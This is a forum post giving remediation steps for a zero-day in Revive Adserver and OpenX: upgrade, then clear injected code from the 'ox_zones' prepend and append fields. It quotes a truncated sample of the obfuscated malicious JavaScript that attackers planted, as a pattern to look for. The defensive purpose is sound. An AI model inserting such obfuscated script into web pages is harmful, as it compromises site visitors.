Jump to content

Hey_neken

Approved members
  • Posts

    1
  • Joined

  • Last visited

Everything posted by Hey_neken

  1. If someone is suffering alerts from Avast alerting about some trojan in the invocation code as shown on #224 ( https://github.com/revive-adserver/revive-adserver/issues/224 ) please do the following: - Upgrade to revive-adserver-3.0.2 ASAP. The bug is present on =<revive-adsever-3.0.1 and on OpenX (confirmed on 2.8.7 to 2.8.11). This won't fix the problem but will prevent more attacks. More info at: http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/ - Look in 'ox_zones' table for any suspicious code. The code will be on the 'prepend' and 'append' fields. It will look something like: <script>try{$a=~[];$a={___:++$a,$$$$![]+\"\")[$a],__$:++$a,$_$_![]+\"\")[$a],_$_:++$a,$_$${}+\"\")[$a],$$_$$a[$a]+\"\")[$a],_$$:++$a,$$$_!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__{}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$ (...) - Empty those fields
×
×
  • Create New...